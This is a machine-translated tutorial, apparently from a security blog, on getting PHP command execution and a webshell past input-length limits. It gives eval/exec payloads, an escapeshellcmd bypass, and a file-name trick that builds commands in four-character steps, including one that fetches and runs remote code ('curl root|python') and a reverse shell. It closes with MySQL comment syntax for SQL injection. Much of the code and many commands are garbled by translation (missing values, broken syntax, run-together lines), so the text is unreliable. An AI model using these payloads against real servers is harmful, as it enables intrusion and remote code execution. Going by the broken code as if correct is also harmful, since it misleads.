How to successfully get to Webshell if the command length is limited (the function parameter is limited breakthrough, MySQL's Sao operation)

0x01 question raised

Remember the last time I took Webshell's hole (how to write a backdoor without numbers and letters in PHP), we talked about some of the tricks of PHP that cleverly bypassed numbers and letters, What I'm going to share with you today is how to get to Webshell with a limited command length, and a break in the limits of function parameters, some of MySQL's tricks.

Analysis of 0x02 problems

Let's look at an example:

<? PHP     $param $_reguest [' Param '];     if (strlen($param) <)        {eval($param);    }? >

This part of the above means that we can execute the code by bypassing the length limit. This is actually very simple, we can use the call eval or assert this backdoor function can directly bypass the ~ ~

The arguments in the eval function are characters, such as the following:

Eval (' echo 1; ');

The argument in the assert function is an expression (or a function), and we can do this as follows:

assert (phpinfo

And I see the PHP manual to understand thatassert is a function,eval is not a function, is a language constructor,eval ($a) $a can only be string,assert ($a) The $a can be either PHP code or a string of PHP code. assert ($a) $a If the string form cannot have more than 2 semicolons, if there are more than 2 semicolons executed only to the first, use the assert To execute multiple PHP statements can be done with Eval.

For example, look like this:

assert (eval("Echo 1;echo 2;"));

The results are as follows:

Like the above sentence, if it is an assert (eval ("Echo 1;echo 2"), this will not perform echo 1 and will not perform Echo 2 , Because the string used by Eval has a semicolon-like PHP statement, it can be executed as a command if there is a string.

For more details We can refer to the PHP manual:

eval function: http://www.php.net/manual/zh/function.eval.php

Assert function: http://php.net/manual/zh/function.assert.php

What if it's like the following example?

 <? php   $param  = $_reguest  [' param ' ];  if   ( strlen  ( $param ) < && strip Os  ( $param , ' eval ') = = false  &  & stripos  ( $param , ' assert ') = = false   eval  ( $param  ); } ? 

The Striops function is used to find where the target string first appears in the string. This means limiting the length to 16 characters, and not using eval or assert, so how do we execute the command.

We can bypass the restrictions by command execution:

Param= '$_get[1] '; &1=bash

Of course, we can also use the EXEC function:

param=exec($_get[1]);

exec can execute an external program, and see the PHP Manual for details: http://php.net/manual/zh/function.exec.php

What if this is it?

<? PHP     $command = ' dir '. $_post [' dir '];     $escaped _command Escapeshellcmd ($command);     Var_dump ($escaped _command);     file_put_contents (' Out.bat ',$escaped _command);     system (' Out.bat ');? >

We tested it:

How should we go around?

Let's take a look at these functions, theescapeshellcmd () function escapes characters in a string that might trick the shell command into executing arbitrary commands. This function guarantees that the data entered by the user is escaped before being transferred to the exec () or system () function, or before the operator is executed.

See the PHP Manual for detailed usage of the escapeshellcmd () function: http://php.net/manual/zh/function.escapeshellcmd.php

So what characters does this function escape?

We read through the source code to know that these characters can be used ^ to replace its meaning. That's no way to use & | To perform other commands, you can only list directories

Interested students can study the source code, I sent the source to the Local: Https://files.cnblogs.com/files/ECJTUACM-873284962/exec.rar

So we've got one of those tips: when executing a. bat file, using%1A, you can bypass the filter execution command, and we try to do the following:

Before we have said how to limit the 16 characters characters to get Webshell, in the binary exploit, when we encounter the controllable data only 8 bytes, remove the string tail of the, limit to 7 characters. So what do we do in this situation?

Let's look at the previous example and change the command length to 7.

<? PHP     $param $_reguest [' Param '];     if (strlen($param) < 8) {        eval($param);    }? >

This reminds me of Zhao Benshan in the sketch of the "hourly" inside a question, put the elephant into the refrigerator should be divided into several steps?

At this point we need to cushion some basic knowledge.

We can assemble the commands.

Let's take a more demanding issue, the command length is limited to 5, how to complete the injection, and the successful get to Webshell?

<?PHP$sandbox= '/www/sandbox/'.MD5("Orange".$_server[' REMOTE_ADDR ']); @mkdir($sandbox); @chdir($sandbox); if(isset($_get[' cmd ']) &&strlen($_get[' cmd ']) <= 5) {        @exec($_get[' cmd ']); } Else if(isset($_get[' Reset '])) {        @exec('/bin/rm-rf '.$sandbox); }    Highlight_file(__file__);

For example, we are going to execute echo Hello This command, what should we do?

We can construct the following:

>echo>hello

The results are as follows:

We can see that two files were created, Echo and Hello, we execute * command

We can see that the echo Hello command is executed, so the Hello string is printed directly

We can use echo * to see what's inside.

We >echo and >hello to complete the command stitching, and then compose and execute the command echo Hello

What if the conditions are a little more harsh? Limit the command length to 4, how to complete the injection, the successful get to Webshell it?

<?PHP$sandbox= '/www/sandbox/'.MD5("Orange".$_server[' REMOTE_ADDR ']); @mkdir($sandbox); @chdir($sandbox); if(isset($_get[' cmd ']) &&strlen($_get[' cmd ']) <= 4) {        @exec($_get[' cmd ']); } Else if(isset($_get[' Reset '])) {        @exec('/bin/rm-rf '.$sandbox); }    Highlight_file(__file__);

For example, if we want to execute the ls-l command, we can imitate the above practice and construct the following:

>ls>-l

The results are as follows:

We can see that two files were created, namely LS and-l, and we executed the * command

Eh, what's the also reported wrong?

In fact, we just generated the Echo and hello,e ASCII value is less than H, so when the sort of automatically put echo in front, hello in the back, and ls we can see, at this time the file is displayed in the order of-L in the front of LS. If we execute * actually execute- l LS will pop up an error message

So how do we get ls-l ?

0x03 solution 01. Command Content Reverse order

The simplest way to do this is to turn around in the opposite order.

Can we take this command character sequence in turn to see L-SL, so that the order just satisfies the requirement? Next we just need to use a command Revthat can turn the character back, and we can do this.

So first of all, we first created two files, namely L and sl.

>l->sl

The results are as follows:

Then write the l-sl combination to file V and view the contents of the V file.

We can see that there is a V in the file V, which interferes with our command, what if we only want to have l and slin the file?

Here's a little trick,dir a b>c this command can write a B to file C without writing extra commands in.

We create a file named Dir, and then execute the *>vto get the l and ls

>direcho **>VCAT v

The results are as follows:

And then we just need to reverse the sequence of this command character, and here we have a rev command that can reverse the content.

So we need to generate a file called Rev , then execute *v , at which point the command corresponds to Rev v, which is named V to be matched by wildcards, which produces the output we want ls-l .

>revls*v

The results are as follows:

Then it is output to file X, and then you can execute sh x, successfully executing the ls-l command with a length of 5 in 4 characters.

*v>xcat xsh x

The results are as follows:

Write the above command into a shell script as follows:

# !/usr/bin/env Bash>l->sl>dir*>v>rev*v>Xsh x 

We can see that the entire command chain length is less than or equal to 4, so we can happily execute the ls-l command ~

02. Time Sequencing Tips

In the LS command, there is a parameter-T, can be sorted according to the time of occurrence, the file of Mr. Cheng is in the back, the resulting file is in front, similar to the structure of the stack.

Suppose we want to generate the ls-t >g command, which is in reverse order g< T-SL, in the order of ASCII values,T will be behind SL , does not meet the demand. So we make a flexible, generate command ls-th >g, reverse is g> HT-SL, just meet the order requirements.

>g\>>ht->sl>dir*>v>rev*v>Xcat x

The results are as follows:

03. Continuation Skill Stitching Command

Linux has a magical symbol \ (backslash), you can continue the command line, such as the following example, I created two files A and B, we use the LS command to see the effect and continuation of the same effect is the same.

>a>blsls

The results are as follows:

In this way, we can construct a series of splicing commands to continue the operation. For example, I'm going to construct a command, Curl Root|python

>on >th\>py\>\| \>ot\>ro\>\ \>rl\>-T

The results are as follows:

Here we may have a little doubt,>th\\ here is looking at 5 characters, more than 4 limit, in fact, because the shell environment needs to input \ \, but the PHP code exec, only need to input \ can generate \, such as exec (" >th\ ") . So this is actually no more than 4 characters.

We'll execute the ls-th>g, import these into the G file in chronological order, and then look at the G file

Then execute SH g rebound shell can, here I do not show to everyone to see, we can do their own on this machine to try ~ ~

Here is a summary of how to successfully get to Webshell in case of command length limitations:

• W Shortest-length command
• Ls-t to list all files in the current directory with the creation time
• File list split each file with a [line feed]
• Line break when introducing ' \ ' to escape ls
• Line break does not affect command execution
• Successfully constructs arbitrary command execution, writes Webshell

There are some comments on the MySQL section, and I'll give you a list:

• In-line comment [#]
• [--] in-line comment, note the space at the end
• [/*...*/] Paragraph comments, can be multiple lines
• ['] In some cases, it can be used as a comment
• [;] In case of multi-sentence execution, the first sentence of SQL statement can be closed directly with semicolons

Specific reference P-Cattle courseware: those from the small dense circle of the artifice

0X04 Extended Reading

• https://speakerd.s3.amazonaws.com/presentations/f81159300925466c88335f3cf740beb6/%E6%9D%A5%E8%87%AA%E5%B0%8F% E5%af%86%e5%9c%88%e9%87%8c%e7%9a%84%e9%82%a3%e4%ba%9b%e5%a5%87%e6%8a%80%e6%b7%ab%e5%b7%a7.pdf
• Https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html
• Https://www.cnblogs.com/ECJTUACM-873284962/p/9433641.html

How to successfully get to Webshell if the command length is limited (the function parameter is limited breakthrough, MySQL's Sao operation)